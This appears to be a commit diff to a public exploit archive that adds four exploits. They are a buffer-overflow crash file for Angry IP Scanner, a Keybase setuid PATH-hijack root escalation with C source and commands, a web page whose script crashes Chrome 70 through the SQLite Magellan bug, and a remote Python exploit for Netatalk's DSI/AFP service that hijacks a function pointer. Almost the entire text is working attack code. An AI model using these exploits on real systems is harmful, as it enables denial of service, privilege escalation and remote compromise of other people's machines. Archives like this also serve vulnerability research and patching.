xianlimei
diff --git a/‎exploits/linux/dos/46038.py
Lines changed: 24 additions & 0 deletions b/‎exploits/linux/dos/46038.py
Lines changed: 24 additions & 0 deletions
diff --git a/‎exploits/linux/local/46044.md
Lines changed: 94 additions & 0 deletions b/‎exploits/linux/local/46044.md
Lines changed: 94 additions & 0 deletions
diff --git a/‎exploits/multiple/dos/46042.html
Lines changed: 136 additions & 0 deletions b/‎exploits/multiple/dos/46042.html
Lines changed: 136 additions & 0 deletions
diff --git a/‎exploits/multiple/remote/46048.py
Lines changed: 44 additions & 0 deletions b/‎exploits/multiple/remote/46048.py
Lines changed: 44 additions & 0 deletions
@@ -0,0 +1,24 @@
+# Exploit Title: Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)
+# Discovery by: Mr Winst0n
+# Discovery Date: 2018-12-22
+# Vendor Homepage: https://angryip.org/
+# Software Link : https://angryip.org/download/
+# Tested Version: 3.5.3 (latest version)
+# Tested on: Kali linux
+# Vulnerability Type: Denial of Service (DoS)
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python angryip.py
+# 2.- Open Xangry.txt and copy content to clipboard
+# 3.- Open Angry IP Scanner
+# 4.- Go to "Tools" in toolbar, click on "Preferences", then in the tab "Ports",
+# 5.- Paste ClipBoard on "Port selection", and click on "OK",
+# 6.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 384
+crash = buffer + "BBBB" + "CCCC"
+f = open("Xangry.txt", "w")
+f.write(crash)
+f.close()
@@ -0,0 +1,94 @@
+keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application to executing a custom fusermount binary as root.
+
+## Environment
+
+CentOS Linux release 7.4.1708 (Core)
+3.10.0-693.17.1.el7.x86_64
+
+RPM info
+
+```
+Name        : keybase
+Version     : 2.8.0.20181017144746.3efc4cbf3c
+Release     : 1
+Architecture: x86_64
+Install Date: Mon 22 Oct 2018 05:30:36 PM EDT
+Group       : Unspecified
+Size        : 273302678
+License     : BSD
+Signature   : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7
+Source RPM  : keybase-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm
+Build Date  : Wed 17 Oct 2018 10:54:47 AM EDT
+Build Host  : 6ae61e160e87
+Relocations : (not relocatable)
+Summary     : Keybase command line client
+Description :
+Keybase command line client
+```
+
+An unprivileged user named user1 is used for this PoC.
+
+## Steps to reproduce
+
+1) Display privileges of user 1 - execute the id command
+
+```
+[user1@localhost woot]$ id
+uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+```
+
+2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed.
+
+```
+cat >fusermount.c<<EOF
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+int main(int argc, char **argv)
+{
+  setreuid(0,0);
+  system("/usr/bin/touch /w00t");
+  return(0);
+}
+EOF
+``
+
+3) Compile fusermount.c
+
+```
+gcc -Wall fusermount.c -o fusermount
+```
+
+4) Verify that /w00t does not exist.
+
+```
+[user1@localhost woot]$ ls -ld /w00t
+ls: cannot access /w00t: No such file or directory
+```
+
+5) Prepend the PATH environment variable with a dot(for current working directory) and execute keybase-redirector which in turn will execute the malicious fusermount binary as root.
+
+```
+env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
+```
+
+6) Enter the control-c sequence to kill the application.
+
+```
+[user1@localhost woot]$ env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
+^C
+```
+
+7) Verify that /w00t exists
+
+```
+[user1@localhost woot]$ ls -ld /w00t
+-rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t
+[user1@localhost woot]$
+```
+
+## Impact
+
+Unauthorized root access is possible which impacts the confidentially, integrity, and availability of the system.
@@ -0,0 +1,136 @@
+<!---
+title: Crash Chrome 70 with the SQLite Magellan bug
+categories: chrome
+permalink: /sqlitebug/
+layout: post
+---!>
+
+<p>This proof-of-concept crashes the Chrome renderer process using <a href="https://blade.tencent.com/magellan/index_en.html">Tencent Blade Team's Magellan SQLite3 bug</a>. It's based on  <a href="https://www.sqlite.org/src/info/940f2adc8541a838">a SQLite test case</a> from the commit that fixed the bug.</p>
+
+<p><span id="prompttext">If you're using Chrome 70 or below, tap the button below to crash this page:</span></p>
+<button onClick="crash()" style="font-size: 150%">Crash this page</button>
+<p>Your browser's user agent is: <span id="browserUserAgent">not available without JavaScript. Turn it on!</span></p>
+
+<p><a href="https://github.com/zhuowei/worthdoingbadly.com/blob/master/_posts/2018-12-14-sqlitebug.html">Source code for this page on GitHub</a>.</p>
+
+<h1>Sign up for more information</h1>
+<p>I'm working on understanding how this issue affects browsers. To get notified when I update this page, please sign up to my mailing list:</p>
+<form action="https://worthdoingbadly.us18.list-manage.com/subscribe/post?u=3f9820ca33ce6a7b1e682c9ac&id=014e6793b7&SIGNUP=inline-sqlitebug" method="post" id="mc-embedded-subscribe-form-inline" name="mc-embedded-subscribe-form-inline" class="validate" target="_blank">
+    <input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL" placeholder="Email">
+    <div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_3f9820ca33ce6a7b1e682c9ac_014e6793b7" tabindex="-1" value=""></div>
+    <input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="button">
+</form>
+
+<h1>What's supposed to happen?</h1>
+<p>After you press the button, the page should crash:</p>
+<p><img src="/assets/blog/sqlitebug/sqlite_cropped.png" alt="screenshot"></p>
+<p>On Android 5.1, I get a segfault in memcpy:</p>
+<pre style="font-size: 10px">
+        F/libc    ( 3801): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xe0ddb457 in tid 3854 (Database thread)
+        I/DEBUG   (  142): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
+        I/DEBUG   (  142): Build fingerprint: 'google/nakasi/grouper:5.1/LMY47D/1743759:user/release-keys'
+        I/DEBUG   (  142): Revision: '0'
+        I/DEBUG   (  142): ABI: 'arm'
+        I/DEBUG   (  142): pid: 3801, tid: 3854, name: Database thread  >>> com.android.chrome:sandboxed_process6 <<<
+        I/DEBUG   (  142): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe0ddb457
+        I/DEBUG   (  142):     r0 e0ddb457  r1 611be0ab  r2 00000002  r3 ff000000
+        I/DEBUG   (  142):     r4 611be038  r5 00000002  r6 611be0a9  r7 7fffffff
+        I/DEBUG   (  142):     r8 00000001  r9 611be0ab  sl 80000001  fp 00000000
+        I/DEBUG   (  142):     ip 00000066  sp 6defd3a0  lr 00000074  pc 4025eb62  cpsr 680f2430
+        I/DEBUG   (  142): 
+        I/DEBUG   (  142): backtrace:
+        I/DEBUG   (  142):     #00 pc 0000fb62  /system/lib/libc.so (__memcpy_base+217)
+        I/DEBUG   (  142):     #01 pc 018d0e1d  /data/app/com.android.chrome-1/base.apk
+</pre>
+
+<h1>What's affected?</h1>
+<p>Affected: tested, causes one tab/one window to crash:</p>
+<ul>
+    <li>Chrome 70.0.3538.110 on Android 5.1 and 9</li>
+    <li>Electron 2.0.12 on macOS 10.14</li>
+</ul>
+<p>Not affected:</p>
+<ul>
+    <li>Chrome 71.0.3578.98 on Android 8.1 (already fixed)</li>
+    <li>Safari (doesn't have FTS enabled in SQLite3)</li>
+    <li>Browsers not based on Chrome (no WebSQL support)</li>
+</ul>
+
+<script>
+// https://gist.github.com/nolanlawson/0264938033aca2201012
+// https://www.sqlite.org/src/info/940f2adc8541a838
+const db = openDatabase('fts_demo', 1, 'fts_demo', 5000000);
+
+const firstStatements = [
+"DROP TABLE IF EXISTS ft;",
+"CREATE VIRTUAL TABLE ft USING fts3;",
+"INSERT INTO ft VALUES('aback');",
+"INSERT INTO ft VALUES('abaft');",
+"INSERT INTO ft VALUES('abandon');",
+];
+
+const secondStatements = [
+"SELECT quote(root) from ft_segdir;",
+"UPDATE ft_segdir SET root = X'0005616261636B03010200FFFFFFFF070266740302020003046E646F6E03030200';",
+"SELECT * FROM ft WHERE ft MATCH 'abandon';"
+];
+
+function dbSuccess() {
+	console.log("success");
+	console.log(arguments);
+}
+
+function dbErr() {
+	console.log("err");
+	console.log(arguments);
+}
+
+function runAll(statements, success) {
+	db.transaction((tx) => {
+		console.log("alive");
+		for (const statement of statements) {
+			console.log("queueing " + statement);
+			tx.executeSql(statement, [], dbSuccess, dbErr);
+		}
+		console.log("queued");
+	}, dbErr, success);
+}
+function crash() {
+	runAll(firstStatements, (event) => {
+		console.log(event);
+		runAll(secondStatements, (event) => {
+			console.log(event);
+		});
+	});
+}
+// onload
+function getChromeVersion(userAgent) {
+    for (const part of userAgent.split(" ")) {
+        if (part.startsWith("Chrome/") || part.startsWith("Chromium/")) {
+            return part.substring(part.indexOf("/") + 1);
+        }
+    }
+    return null;
+}
+function isChromeSupported(chromeVersion) {
+    if (chromeVersion == null) return false;
+    const firstPart = chromeVersion.substring(0, chromeVersion.indexOf("."));
+    return parseInt(firstPart) <= 70;
+}
+function getPromptText(userAgent) {
+    const chromeVersion = getChromeVersion(userAgent);
+    if (chromeVersion == null) {
+        return "This demo only works on Chrome 70 or below. Open this page in Chrome 70, then tap the button.";
+    }
+    const chromeOK = isChromeSupported(chromeVersion);
+    if (chromeOK) {
+        return "You're using Chrome 70 or below, so you may be vulnerable. Tap the button to crash this page.";
+    }
+    return "Your Chrome is too new. Open this page in Chrome 70, then tap the button.";
+}
+function onLoad() {
+    document.getElementById("browserUserAgent").textContent = navigator.userAgent;
+    document.getElementById("prompttext").textContent = getPromptText(navigator.userAgent);
+}
+window.onload = onLoad;
+</script>
@@ -0,0 +1,44 @@
+import socket
+import struct
+import sys
+if len(sys.argv) != 3:
+    sys.exit(0)
+ip = sys.argv[1]
+port = int(sys.argv[2])
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
+sock.connect((ip, port))
+dsi_payload = "\x00\x00\x40\x00" # client quantum
+dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
+dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
+dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
+dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
+dsi_opensession = "\x01" # attention quantum option
+dsi_opensession += struct.pack("B", len(dsi_payload)) # length
+dsi_opensession += dsi_payload
+dsi_header = "\x00" # "request" flag
+dsi_header += "\x04" # open session command
+dsi_header += "\x00\x01" # request id
+dsi_header += "\x00\x00\x00\x00" # data offset
+dsi_header += struct.pack(">I", len(dsi_opensession))
+dsi_header += "\x00\x00\x00\x00" # reserved
+dsi_header += dsi_opensession
+sock.sendall(dsi_header) 
+resp = sock.recv(1024)
+print "[+] Open Session complete"
+afp_command = "\x01" # invoke the second entry in the table
+afp_command += "\x00" # protocol defined padding
+afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
+afp_command += struct.pack("Q", 0x4295f0) # address to jump to
+dsi_header = "\x00" # "request" flag
+dsi_header += "\x02" # "AFP" command
+dsi_header += "\x00\x02" # request id
+dsi_header += "\x00\x00\x00\x00" # data offset
+dsi_header += struct.pack(">I", len(afp_command))
+dsi_header += '\x00\x00\x00\x00' # reserved
+dsi_header += afp_command
+print "[+] Sending get server info request"
+sock.sendall(dsi_header) 
+resp = sock.recv(1024)
+print resp
+print "[+] Fin."